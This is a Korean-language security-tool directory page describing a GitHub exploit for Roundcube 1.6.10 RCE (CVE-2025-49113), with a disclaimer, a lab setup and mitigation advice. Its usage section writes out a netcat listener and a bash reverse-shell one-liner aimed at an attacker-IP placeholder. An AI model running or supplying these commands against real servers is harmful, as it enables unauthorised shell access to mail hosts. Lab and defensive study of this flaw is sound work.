Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-49113-Roundcube_1.6.10 — Roundcube 1.6.10(CVE-2025-49113)용 인증된 원격 코드 실행 익스플로잇. 웹메일 인터페이스를 통해 특수 제작된 PHP 페이로드로 리버스 셸을 전달합니다. | Kitploit
도구/GitHubGitHub/cyberquestor-infosec/cve-2025-49113-roundcube_1.6.10
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubcyberquestor-infosec/cve-2025-49113-roundcube_1.6.10

CVE-2025-49113-Roundcube_1.6.10

Roundcube 1.6.10(CVE-2025-49113)용 인증된 원격 코드 실행 익스플로잇. 웹메일 인터페이스를 통해 특수 제작된 PHP 페이로드로 리버스 셸을 전달합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
1년 전아직 검토되지 않음

CVE-2025-49113 – Roundcube 1.6.10 인증된 원격 코드 실행

⚠️ 면책 조항
이 저장소는 교육 및 연구 목적으로만 사용됩니다.
모든 시연은 통제된 실험실 환경에서 수행되었습니다.
명시적 허가 없이 시스템을 무단 테스트하거나 악용하는 것은 불법이며 비윤리적입니다. 저자는 이 정보의 오용에 대해 책임을 지지 않습니다.


📌 Roundcube란 무엇인가?

Roundcube는 PHP로 작성된 널리 사용되는 브라우저 기반 IMAP 이메일 클라이언트입니다. 웹메일 접근을 위한 사용자 친화적인 인터페이스를 제공하며, 호스팅 제공업체, 학술 기관 및 내부 엔터프라이즈 메일 서버에서 일반적으로 배포됩니다.


🚨 취약점 정보

CVE-2025-49113은 Roundcube 버전 1.6.10에 영향을 미치는 취약점으로, 인증된 사용자가 웹메일 인터페이스를 통해 조작된 명령을 제출하여 원격 코드 실행(RCE)을 달성할 수 있게 합니다.

성공적인 악용에는 유효한 사용자 자격 증명이 필요합니다. 악용에 성공하면 웹 서버의 컨텍스트를 기반으로 시스템 수준의 명령 실행이 가능합니다.

  • CVE ID: CVE-2025-49113
  • 영향을 받는 애플리케이션: Roundcube 1.6.10
  • 취약점 유형: 인증된 원격 코드 실행
  • 익스플로잇 유형: PHP 페이로드를 통한 리버스 셸
  • 익스플로잇 공개 여부: 공개 GitHub PoC

⚙️ 실험실 구성

  • 대상 URL: http://mail.outbound.htb
  • Roundcube 버전: 1.6.10
  • 리스너: 포트 4444의 Netcat
  • 익스플로잇: CVE-2025-49113.php

🚀 익스플로잇 사용법

1. Netcat 리스너 시작

root@kitploit:~
nc -nlvp 4444

2. 익스플로잇 실행

root@kitploit:~
php CVE-2025-49113.php {url} {username} {password} "bash -c 'bash -i >& /dev/tcp/<YOUR-IP>/4444 0>&1'"

🔧 <YOUR-IP>를 공격자의 IP로 교체하세요.


📸 시연

익스플로잇 스크립트 출력

익스플로잇 스크립트 실행

캡처된 리버스 셸

리버스 셸 리스너


🔐 완화 조치

  • Roundcube를 최신 안정적이고 안전한 릴리스로 업그레이드하세요.
  • 취약한 구성 요소에 대한 사용자 접근을 제거하거나 제한하세요.
  • 웹메일 인터페이스에 강력한 접근 제어 및 IP 화이트리스트를 적용하세요.
  • 인증 로그에서 이상 징후를 모니터링하세요.
  • 웹 서버 환경에 최소 권한 원칙을 적용하세요.

📝 참고 사항

  • 익스플로잇에는 인증이 필요합니다.
  • Roundcube 1.6.10에서만 테스트되었습니다.
  • 셸의 사용자 컨텍스트는 서버 구성에 따라 다릅니다.
  • 시연은 가상 실험실 환경에서 수행되었습니다.

📚 참고 자료

  • OffSec 블로그 게시물
  • 공개 익스플로잇

📝 Medium 블로그

제 Medium 게시물에서 상세한 분석과 이론을 확인하세요:
👉 Medium에서 블로그 읽기

도구 다운로드